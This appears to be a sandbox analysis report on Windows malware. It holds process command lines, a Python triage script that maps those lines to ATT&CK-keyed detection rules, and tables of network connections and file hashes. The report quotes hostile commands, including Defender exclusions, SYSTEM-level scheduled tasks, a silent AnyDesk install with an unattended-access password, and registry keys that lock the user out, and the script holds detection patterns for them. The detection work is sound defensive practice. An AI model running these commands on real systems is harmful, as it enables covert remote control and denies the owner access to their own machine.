reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideRestart /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSleep /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSwitchAccount /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSignOut /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HidePowerOptions /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe
C:\Users\Admin\AppData\Roaming/AutoHotkeyU64.exe C:\Users\Admin\AppData\Roaming/doorbell2.ahk
C:\Windows\system32\timeout.exe
timeout /t 5 /nobreak
C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe
C:\Users\Admin\AppData\Roaming/AutoHotkeyU64.exe C:\Users\Admin\AppData\Roaming/doorbell.ahk
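Read top to bottom, the Processes section is a script: stage payloads in C:\ProgramData under system-binary names (svchost.exe, conhost.exe), exclude that directory and each binary from Defender, register ONLOGON tasks that run with highest privileges as SYSTEM, install AnyDesk silently and set its unattended-access password, then strip Task Manager, logoff, lock and power options from the user via policy keys. The Python below is an added example, not part of the sandbox report or its tooling: it turns those observed command lines into triage rules keyed to MITRE ATT&CK Enterprise v15 technique IDs and runs them over a constructed sample. The nine malicious sample lines are copied from the report; the two benign lines are made up to show that a real svchost.exe under System32 and a task pointing into Program Files do not fire. Rule names, the regexes and the masqueraded_system_binaries helper are my own choices, not a vendor signature set.

```python
import re

# Each rule: (name, ATT&CK Enterprise v15 technique, pattern applied to one command line).
RULES = [
    # Add-MpPreference exclusions carve the staging dir and payloads out of Defender scanning.
    ("defender_exclusion", "T1562.001",
     re.compile(r"\bAdd-MpPreference\b.*-Exclusion(?:Path|Process|Extension)", re.I)),
    # A task whose action lives in ProgramData or a user profile, not Program Files or System32.
    ("schtask_user_writable_target", "T1053.005",
     re.compile(r"\bschtasks(?:\.exe)?\s+/Create\b.*/TR\s+[\"']?"
                r"(?:C:\\ProgramData|C:\\Users\\[^\\]+\\AppData)", re.I)),
    # Unattended remote-access install, or setting/removing its unattended-access password.
    ("rmm_silent_install_or_password", "T1219",
     re.compile(r"anydesk\.exe[\"']?\s+--(?:install\b.*--silent|set-password|remove-password)", re.I)),
    # Policy values that take Task Manager, logoff, lock and power options away from the user.
    ("registry_lockdown_policy", "T1112",
     re.compile(r"\breg(?:\.exe)?\s+add\b.*(?:\\Policies\\(?:System|Explorer)\s+/v\s+"
                r"(?:DisableTaskMgr|NoClose|NoLogoff|DisableLockWorkstation|DisableChangePassword|"
                r"HidePowerOptions|HideFastUserSwitching)\b|PolicyManager\\default\\Start\\Hide\w+)", re.I)),
    # Script host launched on a .vbs dropped under %TEMP%.
    ("script_host_from_temp", "T1059.005",
     re.compile(r"\bwscript(?:\.exe)?\b.*\\Temp\\.*\.vbs\b", re.I)),
]

# Names of Windows binaries that are only legitimate under C:\Windows.
MASQUERADE_NAMES = {"svchost.exe", "conhost.exe", "lsass.exe", "csrss.exe", "explorer.exe"}
_PATH_RE = re.compile(r'[A-Za-z]:[\\/][^"\s]+?\.exe\b', re.I)


def masqueraded_system_binaries(cmdline):
    """Return every path in cmdline whose file name is a Windows system binary
    but which sits outside C:\\Windows (ATT&CK T1036.005). Forward and back
    slashes are normalised first because the sample mixes both."""
    hits = []
    for m in _PATH_RE.finditer(cmdline):
        path = m.group(0).replace("/", "\\")
        name = path.rsplit("\\", 1)[-1].lower()
        if name in MASQUERADE_NAMES and not path.lower().startswith("c:\\windows\\"):
            hits.append(path)
    return hits


def triage(cmdlines):
    """Run every rule over every command line; one (rule, technique, cmdline) per hit."""
    findings = []
    for line in cmdlines:
        for name, technique, pattern in RULES:
            if pattern.search(line):
                findings.append((name, technique, line))
        for _path in masqueraded_system_binaries(line):
            findings.append(("masquerade_system_binary", "T1036.005", line))
    return findings


def summarize(findings):
    """Count hits per rule name."""
    counts = {}
    for name, _technique, _line in findings:
        counts[name] = counts.get(name, 0) + 1
    return counts


# Constructed sample: the first nine lines are command lines from the report's
# Processes section; the last two are made-up benign lines that must not fire.
SAMPLE_CMDLINES = [
    r'"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\20E9.tmp\20EA.tmp\20EB.vbs //Nologo',
    r'"c:/users/Admin/downloads/Anydesk.exe" --install "C:\ProgramData" --silent',
    r'"C:\ProgramData/Anydesk.exe" --set-password',
    r'powershell -c Copy-Item "c:/users/Admin/downloads/svchost.exe" -Destination "C:\ProgramData" -r -force',
    r'powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData"',
    r'powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/conhost.exe"',
    r'schtasks /Create /TN OneDriveTaskReport /TR "C:\ProgramData/svchost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F',
    r'REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f',
    r'reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideShutDown /v value /t REG_DWORD /d 1 /f',
    r'C:\Windows\system32\svchost.exe -k netsvcs',  # constructed, benign
    r'schtasks /Create /TN NightlyBackup /TR "C:\Program Files\Backup\backup.exe" /SC DAILY /ST 02:00',  # constructed, benign
]

if __name__ == "__main__":
    for name, technique, line in triage(SAMPLE_CMDLINES):
        print(f"{technique:<10} {name:<32} {line}")
    print(summarize(triage(SAMPLE_CMDLINES)))
```

In practice the input would be the CommandLine field of Sysmon Event ID 1 or Security 4688 events rather than a hard-coded list. Two design points carry over: the scheduled-task rule keys on where the /TR target lives, not on the task name, because names such as MicrosoftEdgeUpdateTaskList and OneDriveTaskReport are picked to blend in; and the remote-access rule is written to the AnyDesk switches seen here (--install --silent, --set-password, --remove-password), so it needs a per-tool clause for any other RMM product in the environment.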
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | boot.net.anydesk.com | udp |
| DE | 49.12.130.236:443 | boot.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | relay-d4aa0625.net.anydesk.com | udp |
| GB | 57.128.141.164:443 | relay-d4aa0625.net.anydesk.com | tcp |
| DE | 49.12.130.236:443 | boot.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | ctt.ac | udp |
| US | 134.209.68.5:443 | ctt.ac | tcp |
| US | 134.209.68.5:443 | ctt.ac | tcp |
| US | 8.8.8.8:53 | clicktotweet.com | udp |
| US | 134.209.68.5:443 | clicktotweet.com | tcp |
| US | 134.209.68.5:443 | clicktotweet.com | tcp |
| US | 8.8.8.8:53 | relay-ad195ac5.net.anydesk.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| GB | 57.128.141.163:443 | relay-ad195ac5.net.anydesk.com | tcp |
| BE | 64.233.167.157:443 | stats.g.doubleclick.net | tcp |
| BE | 64.233.167.157:443 | stats.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | twitter.com | udp |
| US | 104.244.42.1:443 | twitter.com | tcp |
| US | 104.244.42.1:443 | twitter.com | tcp |
| N/A | 239.255.102.18:50001 | N/A | udp |
| N/A | 239.255.102.18:20001 | N/A | udp |
| N/A | 239.255.102.18:10810 | N/A | udp |
| N/A | 239.255.102.18:25830 | N/A | udp |
| N/A | 239.255.102.18:26112 | N/A | udp |
| N/A | 239.255.102.18:25149 | N/A | udp |
| N/A | 239.255.102.18:62977 | N/A | udp |
| N/A | 239.255.102.18:36142 | N/A | udp |
| N/A | 239.255.102.18:55586 | N/A | udp |
| N/A | 239.255.102.18:44143 | N/A | udp |
| N/A | 239.255.102.18:10296 | N/A | udp |
| N/A | 239.255.102.18:56456 | N/A | udp |
| N/A | 239.255.102.18:52980 | N/A | udp |
| N/A | 239.255.102.18:21155 | N/A | udp |
| N/A | 239.255.102.18:61452 | N/A | udp |
| N/A | 239.255.102.18:21298 | N/A | udp |
| N/A | 239.255.102.18:50002 | N/A | udp |
| N/A | 239.255.102.18:45624 | N/A | udp |
| N/A | 239.255.102.18:38395 | N/A | udp |
| N/A | 239.255.102.18:62185 | N/A | udp |
| N/A | 239.255.102.18:56688 | N/A | udp |
| N/A | 239.255.102.18:45492 | N/A | udp |
| N/A | 239.255.102.18:486 | N/A | udp |
| N/A | 239.255.102.18:51771 | N/A | udp |
| N/A | 239.255.102.18:46409 | N/A | udp |
| N/A | 239.255.102.18:59788 | N/A | udp |
| N/A | 239.255.102.18:48667 | N/A | udp |
| N/A | 239.255.102.18:55503 | N/A | udp |
| N/A | 239.255.102.18:41705 | N/A | udp |
| N/A | 239.255.102.18:44565 | N/A | udp |
| N/A | 239.255.102.18:64446 | N/A | udp |
| N/A | 239.255.102.18:38749 | N/A | udp |
| N/A | 239.255.102.18:50003 | N/A | udp |
| N/A | 239.255.102.18:19369 | N/A | udp |
| N/A | 239.255.102.18:43099 | N/A | udp |
| N/A | 239.255.102.18:11206 | N/A | udp |
| N/A | 239.255.102.18:60064 | N/A | udp |
| N/A | 239.255.102.18:55852 | N/A | udp |
| N/A | 239.255.102.18:57187 | N/A | udp |
| N/A | 239.255.102.18:51265 | N/A | udp |
| N/A | 239.255.102.18:4552 | N/A | udp |
| N/A | 239.255.102.18:8778 | N/A | udp |
| N/A | 239.255.102.18:47290 | N/A | udp |
| US | 104.244.42.1:443 | twitter.com | tcp |
| N/A | 239.255.102.18:50001 | N/A | udp |
| N/A | 239.255.102.18:28266 | N/A | udp |
| N/A | 239.255.102.18:38384 | N/A | udp |
| N/A | 239.255.102.18:11763 | N/A | udp |
| N/A | 239.255.102.18:24580 | N/A | udp |
| N/A | 239.255.102.18:319 | N/A | udp |
| N/A | 239.255.102.18:50002 | N/A | udp |
| N/A | 239.255.102.18:853 | N/A | udp |
| N/A | 239.255.102.18:22296 | N/A | udp |
| N/A | 239.255.102.18:50605 | N/A | udp |
| N/A | 239.255.102.18:59456 | N/A | udp |
| N/A | 239.255.102.18:58819 | N/A | udp |
| N/A | 239.255.102.18:50003 | N/A | udp |
| N/A | 239.255.102.18:25558 | N/A | udp |
| N/A | 239.255.102.18:39581 | N/A | udp |
| N/A | 239.255.102.18:60413 | N/A | udp |
| N/A | 239.255.102.18:40569 | N/A | udp |
| N/A | 239.255.102.18:53658 | N/A | udp |
| N/A | 239.255.102.18:50001 | N/A | udp |
| N/A | 239.255.102.18:61947 | N/A | udp |
| N/A | 239.255.102.18:42999 | N/A | udp |
| N/A | 239.255.102.18:33490 | N/A | udp |
| N/A | 239.255.102.18:21645 | N/A | udp |
| N/A | 239.255.102.18:56528 | N/A | udp |
| N/A | 239.255.102.18:50002 | N/A | udp |
| N/A | 239.255.102.18:44802 | N/A | udp |
| N/A | 239.255.102.18:13547 | N/A | udp |
| N/A | 239.255.102.18:37376 | N/A | udp |
| N/A | 239.255.102.18:48472 | N/A | udp |
| N/A | 239.255.102.18:36225 | N/A | udp |
| N/A | 239.255.102.18:50003 | N/A | udp |
| N/A | 239.255.102.18:27047 | N/A | udp |
| N/A | 239.255.102.18:62609 | N/A | udp |
| N/A | 239.255.102.18:59297 | N/A | udp |
| N/A | 239.255.102.18:60884 | N/A | udp |
| N/A | 239.255.102.18:62567 | N/A | udp |
| US | 8.8.8.8:53 | spankbang.com | udp |
| US | 8.8.8.8:53 | spankbang.com | udp |
| US | 104.19.130.98:443 | spankbang.com | tcp |
| US | 104.19.130.98:443 | spankbang.com | tcp |
| US | 8.8.8.8:53 | api.playanext.com | udp |
| GB | 18.245.187.82:80 | api.playanext.com | tcp |
| US | 104.19.130.98:443 | spankbang.com | tcp |
| US | 104.19.130.98:443 | spankbang.com | tcp |
| US | 104.19.130.98:443 | spankbang.com | tcp |
| US | 104.19.130.98:443 | spankbang.com | tcp |
| US | 8.8.8.8:53 | tb.sb-cd.com | udp |
| US | 8.8.8.8:53 | hls-uranus.sb-cd.com | udp |
| US | 8.8.8.8:53 | deliver.ptgncdn.com | udp |
| US | 8.8.8.8:53 | c.ptgncdn.com | udp |
| US | 8.8.8.8:53 | deliver.ptgncdn.com | udp |
| US | 8.8.8.8:53 | assets.sb-cd.com | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:24510 | udp | |
| N/A | 239.255.102.18:64599 | udp | |
| N/A | 239.255.102.18:15520 | udp | |
| N/A | 239.255.102.18:2184 | udp | |
| N/A | 239.255.102.18:5587 | udp | |
| N/A | 239.255.102.18:49850 | udp | |
| N/A | 239.255.102.18:7749 | udp | |
| N/A | 239.255.102.18:25564 | udp | |
| N/A | 239.255.102.18:38870 | udp | |
| N/A | 239.255.102.18:13918 | udp | |
| N/A | 239.255.102.18:3447 | udp | |
| N/A | 239.255.102.18:36276 | udp | |
| N/A | 239.255.102.18:40100 | udp | |
| N/A | 239.255.102.18:19410 | udp | |
| N/A | 239.255.102.18:9735 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:1279 | udp | |
| N/A | 239.255.102.18:64354 | udp | |
| N/A | 239.255.102.18:38725 | udp | |
| N/A | 239.255.102.18:6665 | udp | |
| N/A | 239.255.102.18:8207 | udp | |
| N/A | 239.255.102.18:51741 | udp | |
| N/A | 239.255.102.18:21497 | udp | |
| N/A | 239.255.102.18:27055 | udp | |
| N/A | 239.255.102.18:49700 | udp | |
| N/A | 239.255.102.18:14762 | udp | |
| N/A | 239.255.102.18:34392 | udp | |
| N/A | 239.255.102.18:61015 | udp | |
| N/A | 239.255.102.18:64695 | udp | |
| N/A | 239.255.102.18:63830 | udp | |
| N/A | 239.255.102.18:51588 | udp | |
| N/A | 239.255.102.18:55614 | udp | |
| N/A | 239.255.102.18:44671 | udp | |
| N/A | 239.255.102.18:65330 | udp | |
| N/A | 239.255.102.18:7621 | udp | |
| N/A | 239.255.102.18:26820 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:9250 | udp | |
| N/A | 239.255.102.18:12279 | udp | |
| N/A | 239.255.102.18:32267 | udp | |
| N/A | 239.255.102.18:12002 | udp | |
| N/A | 239.255.102.18:20437 | udp | |
| US | 104.18.33.166:443 | deliver.ptgncdn.com | tcp |
| US | 104.18.33.166:443 | deliver.ptgncdn.com | tcp |
| US | 104.16.4.5:443 | assets.sb-cd.com | tcp |
| US | 104.16.80.73:443 | static.cloudflareinsights.com | tcp |
| US | 104.16.80.73:443 | static.cloudflareinsights.com | tcp |
| US | 104.16.4.5:443 | assets.sb-cd.com | tcp |
| US | 104.16.4.5:443 | assets.sb-cd.com | tcp |
| US | 104.16.4.5:443 | assets.sb-cd.com | tcp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | tcp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | tcp |
| US | 104.16.4.5:443 | assets.sb-cd.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 2.18.190.80:80 | apps.identrust.com | tcp |
| US | 2.18.190.80:80 | apps.identrust.com | tcp |
| US | 2.18.190.80:80 | apps.identrust.com | tcp |
| US | 2.18.190.81:80 | apps.identrust.com | tcp |
| US | 2.18.190.81:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | flagb93361.spankbang.com | udp |
| US | 104.19.131.98:443 | flagb93361.spankbang.com | tcp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| BE | 23.55.97.11:80 | x2.c.lencr.org | tcp |
| BE | 23.55.97.11:80 | x2.c.lencr.org | tcp |
| BE | 23.55.97.11:80 | x2.c.lencr.org | tcp |
| BE | 23.55.97.11:80 | x2.c.lencr.org | tcp |
| BE | 23.55.97.11:80 | x2.c.lencr.org | tcp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | creative.xlviirdr.com | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | tcp |
| US | 216.239.32.36:443 | region1.google-analytics.com | tcp |
| US | 104.18.40.50:443 | creative.xlviirdr.com | tcp |
| US | 104.18.40.50:443 | creative.xlviirdr.com | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:24615 | udp | |
| N/A | 239.255.102.18:21521 | udp | |
| N/A | 239.255.102.18:1628 | udp | |
| N/A | 239.255.102.18:13515 | udp | |
| N/A | 239.255.102.18:63931 | udp | |
| N/A | 239.255.102.18:64497 | udp | |
| N/A | 239.255.102.18:10876 | udp | |
| N/A | 239.255.102.18:13005 | udp | |
| N/A | 239.255.102.18:8546 | udp | |
| N/A | 239.255.102.18:63082 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:36176 | udp | |
| N/A | 239.255.102.18:64864 | udp | |
| N/A | 239.255.102.18:45802 | udp | |
| N/A | 239.255.102.18:9958 | udp | |
| N/A | 239.255.102.18:29095 | udp | |
| N/A | 239.255.102.18:62585 | udp | |
| N/A | 239.255.102.18:20894 | udp | |
| N/A | 239.255.102.18:49123 | udp | |
| N/A | 239.255.102.18:47244 | udp | |
| N/A | 239.255.102.18:36151 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:42587 | udp | |
| N/A | 239.255.102.18:43311 | udp | |
| N/A | 239.255.102.18:1596 | udp | |
| N/A | 239.255.102.18:59489 | udp | |
| N/A | 239.255.102.18:16460 | udp | |
| N/A | 239.255.102.18:8860 | udp | |
| N/A | 239.255.102.18:43866 | udp | |
| N/A | 239.255.102.18:2015 | udp | |
| N/A | 239.255.102.18:17514 | udp | |
| N/A | 239.255.102.18:37388 | udp | |
| US | 8.8.8.8:53 | go.xlviirdr.com | udp |
| US | 8.8.8.8:53 | video.ktkjmp.com | udp |
| US | 172.64.147.206:443 | go.xlviirdr.com | tcp |
| US | 104.18.48.21:443 | video.ktkjmp.com | tcp |
| US | 104.18.48.21:443 | video.ktkjmp.com | tcp |
| US | 172.64.147.206:443 | go.xlviirdr.com | tcp |
| US | 8.8.8.8:53 | img.strpst.com | udp |
| US | 104.17.11.106:443 | img.strpst.com | tcp |
| US | 104.17.11.106:443 | img.strpst.com | tcp |
| US | 8.8.8.8:53 | go.xxxviiijmp.com | udp |
| US | 104.18.40.50:443 | go.xxxviiijmp.com | tcp |
| US | 104.18.40.50:443 | go.xxxviiijmp.com | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:23767 | udp | |
| N/A | 239.255.102.18:27910 | udp | |
| N/A | 239.255.102.18:30462 | udp | |
| N/A | 239.255.102.18:27440 | udp | |
| N/A | 239.255.102.18:58578 | udp | |
| N/A | 239.255.102.18:19282 | udp | |
| N/A | 239.255.102.18:33753 | udp | |
| N/A | 239.255.102.18:43732 | udp | |
| N/A | 239.255.102.18:24016 | udp | |
| N/A | 239.255.102.18:18719 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:3880 | udp | |
| N/A | 239.255.102.18:46706 | udp | |
| N/A | 239.255.102.18:14899 | udp | |
| N/A | 239.255.102.18:24722 | udp | |
| N/A | 239.255.102.18:49528 | udp | |
| N/A | 239.255.102.18:34678 | udp | |
| N/A | 239.255.102.18:63517 | udp | |
| N/A | 239.255.102.18:41669 | udp | |
| N/A | 239.255.102.18:65345 | udp | |
| N/A | 239.255.102.18:43672 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:23005 | udp | |
| N/A | 239.255.102.18:41228 | udp | |
| N/A | 239.255.102.18:52111 | udp | |
| N/A | 239.255.102.18:23710 | udp | |
| N/A | 239.255.102.18:46702 | udp | |
| N/A | 239.255.102.18:37332 | udp | |
| N/A | 239.255.102.18:15142 | udp | |
| N/A | 239.255.102.18:28504 | udp | |
| N/A | 239.255.102.18:54227 | udp | |
| N/A | 239.255.102.18:44942 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:49318 | udp | |
| N/A | 239.255.102.18:17726 | udp | |
| N/A | 239.255.102.18:22026 | udp | |
| N/A | 239.255.102.18:10297 | udp | |
| N/A | 239.255.102.18:33010 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:48621 | udp | |
| N/A | 239.255.102.18:5605 | udp | |
| N/A | 239.255.102.18:16072 | udp | |
| N/A | 239.255.102.18:53531 | udp | |
| N/A | 239.255.102.18:27204 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:20684 | udp | |
| N/A | 239.255.102.18:400 | udp | |
| N/A | 239.255.102.18:53587 | udp | |
| N/A | 239.255.102.18:9340 | udp | |
| N/A | 239.255.102.18:34368 | udp | |
| N/A | 239.255.102.18:9338 | udp | |
| N/A | 239.255.102.18:40979 | udp | |
| N/A | 239.255.102.18:59778 | udp | |
| N/A | 239.255.102.18:22646 | udp | |
| N/A | 239.255.102.18:21096 | udp | |
| N/A | 239.255.102.18:21672 | udp | |
| N/A | 239.255.102.18:16311 | udp | |
| N/A | 239.255.102.18:15476 | udp | |
| N/A | 239.255.102.18:59530 | udp | |
| N/A | 239.255.102.18:33540 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:1614 | udp | |
| N/A | 239.255.102.18:34897 | udp | |
| N/A | 239.255.102.18:29230 | udp | |
| N/A | 239.255.102.18:57242 | udp | |
| N/A | 239.255.102.18:21804 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:48971 | udp | |
| N/A | 239.255.102.18:49475 | udp | |
| N/A | 239.255.102.18:27340 | udp | |
| N/A | 239.255.102.18:16193 | udp | |
| N/A | 239.255.102.18:27804 | udp | |
| N/A | 239.255.102.18:12503 | udp | |
| N/A | 239.255.102.18:24085 | udp | |
| N/A | 239.255.102.18:34632 | udp | |
| N/A | 239.255.102.18:50398 | udp | |
| N/A | 239.255.102.18:31606 | udp | |
| N/A | 239.255.102.18:27611 | udp | |
| N/A | 239.255.102.18:64958 | udp | |
| N/A | 239.255.102.18:18628 | udp | |
| N/A | 239.255.102.18:17643 | udp | |
| N/A | 239.255.102.18:59884 | udp | |
| N/A | 239.255.102.18:32326 | udp | |
| N/A | 239.255.102.18:19006 | udp | |
| N/A | 239.255.102.18:40293 | udp | |
| N/A | 239.255.102.18:56018 | udp | |
| N/A | 239.255.102.18:10154 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:64144 | udp | |
| N/A | 239.255.102.18:10804 | udp | |
| N/A | 239.255.102.18:50882 | udp | |
| N/A | 239.255.102.18:61897 | udp | |
| N/A | 239.255.102.18:38690 | udp | |
| N/A | 239.255.102.18:49171 | udp | |
| N/A | 239.255.102.18:58160 | udp | |
| N/A | 239.255.102.18:28342 | udp | |
| N/A | 239.255.102.18:15329 | udp | |
| N/A | 239.255.102.18:58295 | udp | |
| N/A | 239.255.102.18:6982 | udp | |
| N/A | 239.255.102.18:23476 | udp | |
| N/A | 239.255.102.18:37755 | udp | |
| N/A | 239.255.102.18:38980 | udp | |
| N/A | 239.255.102.18:10135 | udp | |
| N/A | 239.255.102.18:29860 | udp | |
| N/A | 239.255.102.18:445 | udp | |
| N/A | 239.255.102.18:40119 | udp | |
| N/A | 239.255.102.18:12089 | udp | |
| N/A | 239.255.102.18:15898 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:38993 | udp | |
| N/A | 239.255.102.18:26014 | udp | |
| N/A | 239.255.102.18:26352 | udp | |
| N/A | 239.255.102.18:64609 | udp | |
| N/A | 239.255.102.18:22818 | udp | |
| N/A | 239.255.102.18:5009 | udp | |
| N/A | 239.255.102.18:10497 | udp | |
| N/A | 239.255.102.18:31142 | udp | |
| N/A | 239.255.102.18:56231 | udp | |
| N/A | 239.255.102.18:20173 | udp | |
| N/A | 239.255.102.18:53569 | udp | |
| N/A | 239.255.102.18:49187 | udp | |
| N/A | 239.255.102.18:31221 | udp | |
| N/A | 239.255.102.18:977 | udp | |
| N/A | 239.255.102.18:45810 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:45810 | udp | |
| N/A | 239.255.102.18:59339 | udp | |
| N/A | 239.255.102.18:12052 | udp | |
| N/A | 239.255.102.18:3940 | udp | |
| N/A | 239.255.102.18:16498 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:44734 | udp | |
| N/A | 239.255.102.18:54375 | udp | |
| N/A | 239.255.102.18:13591 | udp | |
| N/A | 239.255.102.18:49141 | udp | |
| N/A | 239.255.102.18:57599 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:57389 | udp | |
| N/A | 239.255.102.18:53076 | udp | |
| N/A | 239.255.102.18:26191 | udp | |
| N/A | 239.255.102.18:14215 | udp | |
| N/A | 239.255.102.18:9652 | udp | |
| N/A | 239.255.102.18:14482 | udp | |
| N/A | 239.255.102.18:55881 | udp | |
| N/A | 239.255.102.18:29977 | udp | |
| N/A | 239.255.102.18:51315 | udp | |
| N/A | 239.255.102.18:33111 | udp | |
| N/A | 239.255.102.18:43405 | udp | |
| N/A | 239.255.102.18:24106 | udp | |
| N/A | 239.255.102.18:30216 | udp | |
| N/A | 239.255.102.18:21982 | udp | |
| N/A | 239.255.102.18:41917 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:49101 | udp | |
| N/A | 239.255.102.18:63288 | udp | |
| N/A | 239.255.102.18:10201 | udp | |
| N/A | 239.255.102.18:57603 | udp | |
| N/A | 239.255.102.18:45963 | udp | |
| N/A | 239.255.102.18:7281 | udp | |
| N/A | 239.255.102.18:25487 | udp | |
| N/A | 239.255.102.18:12530 | udp | |
| N/A | 239.255.102.18:52326 | udp | |
| N/A | 239.255.102.18:23033 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:43015 | udp | |
| N/A | 239.255.102.18:6538 | udp | |
| N/A | 239.255.102.18:24990 | udp | |
| N/A | 239.255.102.18:26541 | udp | |
| N/A | 239.255.102.18:27845 | udp | |
| N/A | 239.255.102.18:46687 | udp | |
| N/A | 239.255.102.18:21983 | udp | |
| N/A | 239.255.102.18:40618 | udp | |
| N/A | 239.255.102.18:3831 | udp | |
| N/A | 239.255.102.18:8743 | udp | |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a76485495d07b802e048c41dee64612e |
| SHA1 | d24a7535b344a98f541a63b79a9ba31e8797563a |
| SHA256 | aceb634f0ca0506cfbab6b29f57586ad66e3b749923b0b053ea7a90e0e39f6ad |
| SHA512 | 4e025481ac51017a99952d436952601370aeb0cac492e1607a9090de30d77cca685a4bf150b204931f6a82b30d7826cd452c37d970b33476606d8053fd7bf767 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 1a23bf8131c7f8df0bffd68921db8200 |
| SHA1 | de7ae556cfd41e24aff83604ff13077649cdb529 |
| SHA256 | ef5cf2f7198c296a9e861d855ae548b678cbb380625156e62a53b7000c5e1fbb |
| SHA512 | 510395389357b11d8fbc082afb3b1ec1f5f928f9ae0cf518a0d013c2d759cc92701ff5e18ab182f721b6e0bee023ec4e7d6fe0fabcb2bb4444db86cb5e8011db |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1B1495DD322A24490E2BF2FAABAE1C61
| MD5 | 5ae8478af8dd6eec7ad4edf162dd3df1 |
| SHA1 | 55670b9fd39da59a9d7d0bb0aecb52324cbacc5a |
| SHA256 | fe42ac92eae3b2850370b73c3691ccf394c23ab6133de39f1697a6ebac4bedca |
| SHA512 | a5ed33ecec5eecf5437c14eba7c65c84b6f8b08a42df7f18c8123ee37f6743b0cf8116f4359efa82338b244b28938a6e0c8895fcd7f7563bf5777b7d8ee86296 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 5c17429d97e37d983b8a23361f968c93 |
| SHA1 | 6e6c8f540a3de67f8182e4331b52bc41b80d1a9e |
| SHA256 | 27fe916e059c7a67feef5cb948d55754687e27d306f453d790a308ca5e73f20f |
